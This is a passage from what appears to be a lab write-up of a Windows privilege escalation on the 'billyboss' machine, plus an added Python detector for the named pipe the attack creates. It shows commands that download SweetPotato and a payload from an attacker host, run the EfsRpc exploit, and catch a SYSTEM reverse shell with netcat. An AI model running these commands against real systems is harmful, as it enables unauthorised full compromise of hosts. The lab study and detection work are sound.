SweetPotato
The compromised account, nathan, is a service account with SeImpersonatePrivilege enabled. This makes the target system vulnerable to the potato family of exploits.
PS C:\tmp> iwr -uri http://192.168.45.245/SweetPotato.exe -Outfile C:\tmp\SweetPotato.exe
PS C:\tmp> iwr -uri http://192.168.45.245/pe.exe -Outfile C:\tmp\pe.exe
Delivering the exploit and payload
PS C:\tmp> cmd /c C:\tmp\SweetPotato.exe -p C:\tmp\pe.exe -e EfsRpc
SweetPotato by @_EthicalChaos_
Orignal RottenPotato code and exploit by @foxglovesec
Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery
PrintSpoofer discovery and original exploit by @itm4n
EfsRpc built on EfsPotato by @zcgonvh and PetitPotam by @topotam
[+] Attempting NP impersonation using method EfsRpc to launch C:\tmp\pe.exe
[+] Triggering name pipe access on evil PIPE \\localhost/pipe/a06b4c7f-2590-4464-9fb7-8b0c6fa979b6/\a06b4c7f-2590-4464-9fb7-8b0c6fa979b6\a06b4c7f-2590-4464-9fb7-8b0c6fa979b6
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!
Executing with the EfsRpc method
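Detection logic for the named-pipe trigger shown in the SweetPotato output above, added here as an example (it is not part of this writeup or of the SweetPotato tool): it scans Sysmon-style pipe events (field names EventID, Image and PipeName are assumed; the sample events are constructed) and flags pipe paths that contain a GUID component followed by further path components, the nested shape the EfsRpc method produces, which ordinary flat pipe names such as \srvsvc do not have.

```python
import re

# GUID-shaped path component, as in the pipe name SweetPotato prints above.
GUID = re.compile(r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$", re.I)

# Constructed sample events in a Sysmon-like shape (assumed field names);
# not telemetry captured from the target host.
SAMPLE_EVENTS = [
    {"EventID": 17, "Image": r"C:\Windows\System32\svchost.exe", "PipeName": r"\srvsvc"},
    {"EventID": 17, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "PipeName": r"\PSHost.133000000000000000.4321.DefaultAppDomain.powershell"},
    {"EventID": 17, "Image": r"C:\tmp\SweetPotato.exe",
     "PipeName": r"\\localhost/pipe/a06b4c7f-2590-4464-9fb7-8b0c6fa979b6/\a06b4c7f-2590-4464-9fb7-8b0c6fa979b6\a06b4c7f-2590-4464-9fb7-8b0c6fa979b6"},
    {"EventID": 18, "Image": r"C:\Windows\System32\lsass.exe",
     "PipeName": r"\a06b4c7f-2590-4464-9fb7-8b0c6fa979b6\a06b4c7f-2590-4464-9fb7-8b0c6fa979b6"},
]

def pipe_components(pipe_name):
    """Split a pipe path on either separator and drop empties, a leading
    host and the 'pipe' marker (the tool output mixes '/' and '\\')."""
    parts = [p for p in re.split(r"[\\/]+", pipe_name) if p]
    if parts and parts[0].lower() == "localhost":
        parts = parts[1:]
    if parts and parts[0].lower() == "pipe":
        parts = parts[1:]
    return parts

def is_nested_guid_pipe(pipe_name):
    """True when a GUID component is followed by more path components.
    Ordinary named pipes are flat; a nested GUID path matches the EfsRpc
    trigger shown in the SweetPotato output."""
    parts = pipe_components(pipe_name)
    return any(GUID.match(part) and i + 1 < len(parts) for i, part in enumerate(parts))

def find_suspicious(events):
    """Return (EventID, Image, PipeName) for pipe-created / pipe-connected
    events (Sysmon IDs 17 and 18) whose pipe name looks like a nested GUID path."""
    return [(ev["EventID"], ev["Image"], ev["PipeName"])
            for ev in events
            if ev.get("EventID") in (17, 18) and is_nested_guid_pipe(ev.get("PipeName", ""))]

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print("suspicious pipe event:", hit)
```

On a real host the same heuristic is worth pairing with a process-creation check for a SYSTEM child spawned by a process running under a service account.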
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/billyboss]
└─$ nnc 443
listening on [any] 443 ...
connect to [192.168.45.245] from (UNKNOWN) [192.168.148.61] 63063
Microsoft Windows [Version 10.0.18362.719]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
whoami
nt authority\system
C:\Windows\system32> hostname
hostname
billyboss
C:\Windows\system32> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.148.61
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.148.254
System level compromise